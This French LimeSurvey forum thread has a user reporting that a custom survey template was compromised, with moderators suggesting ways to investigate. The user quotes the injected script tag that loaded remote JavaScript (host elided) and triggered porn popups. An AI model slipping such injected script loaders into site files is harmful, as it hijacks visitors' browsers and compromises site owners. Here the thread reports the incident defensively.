Check out the LimeSurvey source code on GitHub!
Welcome, Guest
Username: Password:

TOPIC: Piratage sur les templates personnalisés

Piratage sur les templates personnalisés 3 years 9 months ago #90441

  • Vinz
  • Vinz's Avatar
  • Offline
  • Fresh Lemon
  • Posts: 4
  • Karma: 0
Bonjour à tous,

Un énorme grand bravo pour Limesurvey, c'est un magnifique module très très complet.
Si vous avez quelques informations pour éviter ce genre de problème, cette semaine, à chaque lancement d'un questionnaire, un lien a caractère pornographique s'ouvrait en popup. Très gênant surtout pour une utilisation professionnelle...

Avec l'aide d'un collègue, nous avons trouvé qu'il a été rajouté dans le fichier "template.js" de mon dossier template personnalisé le code suivant :

"<script name="jsfile" src="http://..../ad.php?id=5" type="text/javascript">
Reload the page to get source for: http://..../ad.php?id=5
</script>"

Savez-vous comment cela peut arriver ?
Pourtant toute les procédures à l'installation de LimeSurvey avaient été faite.
J'ai désormais désinfecté mon PC et changer tous les codes FTP et accès.
Es-ce que ce genre de popup peut revenir ?

Merci à vous :)
Et Joyeux Noel !!!
Last Edit: 3 years 9 months ago by DenisChenu.
The administrator has disabled public write access.

Piratage sur les templates personnalisés 3 years 9 months ago #90443

  • DenisChenu
  • DenisChenu's Avatar
  • Offline
  • Moderator Lime
  • Posts: 9346
  • Thank you received: 1338
  • Karma: 386
Je n'ai pas de connaissance de faille de sécurité à ce niveau concernant LimeSurvey.

Denis
Assistance on LimeSurvey forum and LimeSurvey core developpement are on my free time (Say thanks ?).
A bug not reported is a bug not corrected. | Please, read the documentation | La doc en français à besoin de vous
The administrator has disabled public write access.

Piratage sur les templates personnalisés 3 years 8 months ago #90599

  • Nickko
  • Nickko's Avatar
  • Offline
  • LimeSurvey Team
  • Posts: 2798
  • Thank you received: 366
  • Karma: 78
Pour ça, je pense plutôt à un problème sur ton serveur, toutefois, l'expert en sécurité là où je travaille a déniché quelques failles de sécurité type XSS, on ne peut donc pas exclure que le pirate ait exploité une faiblesse de Limesurvey.

N'as-tu pas un admin réseau ou système qui pourrait analyser les connexions au serveur ?

Peut-être également regarder dans les sauvegardes pour déterminer approximativement la date de la modification du template.
Nickko
Ergonome / Usability expert
The administrator has disabled public write access.

Piratage sur les templates personnalisés 3 years 8 months ago #90668

  • DenisChenu
  • DenisChenu's Avatar
  • Offline
  • Moderator Lime
  • Posts: 9346
  • Thank you received: 1338
  • Karma: 386
Nickko wrote:
l'expert en sécurité là où je travaille a déniché quelques failles de sécurité type XSS,
Ouai, mais vite corrigé hiinn :angry:

:lol:

Qu'il hésite pas à encore en remonter !!
Assistance on LimeSurvey forum and LimeSurvey core developpement are on my free time (Say thanks ?).
A bug not reported is a bug not corrected. | Please, read the documentation | La doc en français à besoin de vous
The administrator has disabled public write access.

Piratage sur les templates personnalisés 3 years 8 months ago #90672

  • Nickko
  • Nickko's Avatar
  • Offline
  • LimeSurvey Team
  • Posts: 2798
  • Thank you received: 366
  • Karma: 78
DenisChenu wrote:
Nickko wrote:
l'expert en sécurité là où je travaille a déniché quelques failles de sécurité type XSS,
Ouai, mais vite corrigé hiinn :angry:

:lol:

Qu'il hésite pas à encore en remonter !!

Je rentre de congé, je n'ai même pas encore eu le temps de regarder ce qu'il avait rapporter.
En tout cas merci d'avoir travailler si vite (pendant que je me reposais lol)
Nickko
Ergonome / Usability expert
The administrator has disabled public write access.
Moderators: Nickko
Time to create page: 0.307 seconds
Imprint                   Privacy policy                  Revocation information and revocation form